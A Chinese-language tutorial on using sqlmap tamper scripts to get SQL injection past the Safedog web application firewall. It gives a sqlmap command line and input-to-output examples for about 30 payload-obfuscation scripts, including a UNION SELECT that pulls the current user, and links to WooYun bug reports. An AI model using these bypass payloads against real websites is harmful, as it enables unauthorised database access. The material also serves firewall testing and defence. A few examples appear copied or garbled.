sqlmap之tamper繞過安全狗
每當注入的時候看到這個賤賤的提示框,內心有千萬只草泥馬在奔騰。
但很多時候還是得靜下來分析過濾系統到底過濾了哪些引數,該如何繞過。
sqlmap中的tamper給我們帶來了很多防過濾的指令碼,非常實用,可能有的朋友還不知道怎樣才能最有效的利用tamper指令碼。
當然使用指令碼之前需要確定的就是系統過濾了哪些關鍵字,比如單引號、空格、select、union、admin等等。
所以有的時候我們會發現,注入成功了但是dump不出資料,很可能是select被過濾了等等原因。
如何判斷使用哪個指令碼
最簡單的辦法就是在url引數中手工帶入關鍵詞,判斷是否被過濾。
如圖:
直接加個單引號被過濾,說明注入時單引號是沒法用的。
空格、等於號都沒有過濾,成功報錯。
select被過濾。
以此類推,當sqlmap注入出現問題時,比如不出資料,就要檢查對應的關鍵詞是否被過濾。
比如空格被過濾可以使用space2comment.py,過濾系統對大小寫敏感可以使用randomcase.py等等。
下面對於sqlmap的tamper引數詳細講解。
使用方法
根據實際情況,可以同時使用多個指令碼,使用-v引數可以看到payload的變化。
sqlmap.py -u "http://www.target.com/test.php?id=12" --dbms mysql --tamper "space2commet,versionedmorekeywords.py" -v 3 --dbs
指令碼名:apostrophemask.py
作用:用utf8代替引號
1 | Example: ( "1 AND '1'='1" ) '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' |
Tested against: all
指令碼名:equaltolike.py
作用:like 代替等號
12345 | Example: * Input: SELECT * FROM users WHERE id=1 * Output : SELECT * FROM users WHERE id LIKE 1 |
案例一: http://wooyun.org/bugs/wooyun-2010-087296
案例二: http://wooyun.org/bugs/wooyun-2010-074790
案例三:http://wooyun.org/bugs/wooyun-2010-072489
指令碼名:space2dash.py
作用:繞過過濾‘=’ 替換空格字元(”),(’ – ‘)後跟一個破折號註釋,一個隨機字串和一個新行(’ n’)
1 | Example: ( '1 AND 9227=9227' ) '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' |
Tested against: * MSSQL * SQLite
案例一:http://wooyun.org/bugs/wooyun-2010-062878
指令碼名:greatest.py
作用:繞過過濾’>’ ,用GREATEST替換大於號。
1 | Example: ( '1 AND A > B' ) '1 AND GREATEST(A,B+1)=A' Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
指令碼名:space2hash.py
作用:空格替換為#號 隨機字串 以及換行符
1234 | Example: * Input: 1 AND 9227=9227 * Output : 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 |
Requirement:
- MySQL Tested against:
- MySQL 4.0, 5.0
指令碼名:apostrophenullencode.py
作用:繞過過濾雙引號,替換字元和雙引號。
1 | Example: tamper( "1 AND '1'='1" ) '1 AND %00%271%00%27=%00%271' |
Tested against:
- MySQL 4, 5.0 and 5.5
- Oracle 10g
- PostgreSQL 8.3, 8.4, 9.0
指令碼名:halfversionedmorekeywords.py
作用:當資料庫為mysql時繞過防火牆,每個關鍵字之前新增mysql版本評論
123 | Example: ( "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa" ) "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" |
Requirement:
- MySQL < 5.1
Tested against:
- MySQL 4.0.18, 5.0.22
指令碼名:space2morehash.py
作用:空格替換為 #號 以及更多隨機字串 換行符
12345 | Example: * Input: 1 AND 9227=9227 * Output : 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 |
Requirement: * MySQL >= 5.1.13 Tested
against: * MySQL 5.1.41
指令碼名:appendnullbyte.py
作用:在有效負荷結束位置載入零位元組字元編碼
1 | Example: ( '1 AND 1=1' ) '1 AND 1=1%00' |
Requirement:
- Microsoft Access
指令碼名:ifnull2ifisnull.py
作用:繞過對 IFNULL 過濾。 替換類似’IFNULL(A, B)’為’IF(ISNULL(A), B, A)’
123 | Example: ( 'IFNULL(1, 2)' ) 'IF(ISNULL(1),2,1)' |
Requirement:
- MySQL
- SQLite (possibly)
- SAP MaxDB (possibly)
Tested against:
- MySQL 5.0 and 5.5
指令碼名:space2mssqlblank.py(mssql)
作用:空格替換為其它空符號
Example: * Input: SELECT id FROM users * Output: SELECT%08id%02FROM%0Fusers
Requirement: * Microsoft SQL Server Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005
ASCII table:
案例一: wooyun.org/bugs/wooyun-2010-062878
指令碼名:base64encode.py
作用:用base64編碼替換 Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all
案例一: http://wooyun.org/bugs/wooyun-2010-060071
案例二: http://wooyun.org/bugs/wooyun-2010-021062
案例三: http://wooyun.org/bugs/wooyun-2010-043229
指令碼名:space2mssqlhash.py
作用:替換空格
1 | Example: ( '1 AND 9227=9227' ) '1%23%0AAND%23%0A9227=9227' Requirement: * MSSQL * MySQL |
指令碼名:modsecurityversioned.py
作用:過濾空格,包含完整的查詢版本註釋
1 | Example: ( '1 AND 2>1--' ) '1 /*!30874AND 2>1*/--' |
Requirement: * MySQL
Tested against:
- MySQL 5.0
指令碼名:space2mysqlblank.py
作用:空格替換其它空白符號(mysql)
12345 | Example: * Input: SELECT id FROM users * Output : SELECT %0Bid%0BFROM%A0users |
Requirement:
- MySQL
Tested against:
- MySQL 5.1
案例一:wooyun.org/bugs/wooyun-2010-076735
指令碼名:between.py
作用:用between替換大於號(>)
1 | Example: ( '1 AND A > B--' ) '1 AND A NOT BETWEEN 0 AND B--' |
Tested against:
- Microsoft SQL Server 2005
- MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0
案例一:wooyun.org/bugs/wooyun-2010-068815
指令碼名:space2mysqldash.py
作用:替換空格字元(”)(’ – ‘)後跟一個破折號註釋一個新行(’ n’)
注:之前有個mssql的 這個是mysql的
1 | Example: ( '1 AND 9227=9227' ) '1--%0AAND--%0A9227=9227' |
Requirement:
- MySQL
- MSSQL
指令碼名:multiplespaces.py
作用:圍繞SQL關鍵字新增多個空格
1 | Example: ( '1 UNION SELECT foobar' ) '1 UNION SELECT foobar' |
Tested against: all
案例一: wooyun.org/bugs/wooyun-2010-072489
指令碼名:space2plus.py
作用:用+替換空格
1 | Example: ( 'SELECT id FROM users' ) 'SELECT+id+FROM+users' Tested against: all |
指令碼名:bluecoat.py
作用:代替空格字元後與一個有效的隨機空白字元的SQL語句。 然後替換=為like
1 | Example: ( 'SELECT id FROM users where id = 1' ) 'SELECT%09id FROM users where id LIKE 1' |
Tested against:
- MySQL 5.1, SGOS
指令碼名:nonrecursivereplacement.py
雙重查詢語句。取代predefined SQL關鍵字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters
1 | Example: ( '1 UNION SELECT 2--' ) '1 UNIOUNIONN SELESELECTCT 2--' Tested against: all |
指令碼名:space2randomblank.py
作用:代替空格字元(“”)從一個隨機的空白字元可選字元的有效集
1 | Example: ( 'SELECT id FROM users' ) 'SELECT%0Did%0DFROM%0Ausers' |
Tested against: all
指令碼名:sp_password.py
作用:追加sp_password’從DBMS日誌的自動模糊處理的有效載荷的末尾
1 | Example: ( '1 AND 9227=9227-- ' ) '1 AND 9227=9227-- sp\_password' Requirement: * MSSQL |
指令碼名:chardoubleencode.py
作用: 雙url編碼(不處理以編碼的)
12345 | Example: * Input: SELECT FIELD FROM %20TABLE * Output : %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545 |
指令碼名:unionalltounion.py
作用:替換UNION ALL SELECT UNION SELECT
Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'
Requirement: all
指令碼名:charencode.py
作用:url編碼
12345 | Example: * Input: SELECT FIELD FROM %20TABLE * Output : %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45 |
tested against:
- Microsoft SQL Server 2005
- MySQL 4, 5.0 and 5.5
- Oracle 10g
- PostgreSQL 8.3, 8.4, 9.0
指令碼名:randomcase.py
作用:隨機大小寫 Example:
- Input: INSERT
- Output: InsERt
Tested against:
- Microsoft SQL Server 2005
- MySQL 4, 5.0 and 5.5
- Oracle 10g
- PostgreSQL 8.3, 8.4, 9.0
指令碼名:unmagicquotes.py
作用:寬字元繞過 GPC addslashes
12345 | Example: * Input: 1′ AND 1=1 * Output : 1%bf%27 AND 1=1–%20 |
指令碼名:randomcomments.py
作用:用/**/分割sql關鍵字
123 | Example: ‘ INSERT ’ becomes ‘ IN //S//ERT’ |
指令碼名:charunicodeencode.py
作用:字串 unicode 編碼
12345 | Example: * Input: SELECT FIELD%20FROM TABLE * Output : %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′ |
Requirement:
- ASP
- ASP.NET
Tested against:
- Microsoft SQL Server 2000
- Microsoft SQL Server 2005
- MySQL 5.1.56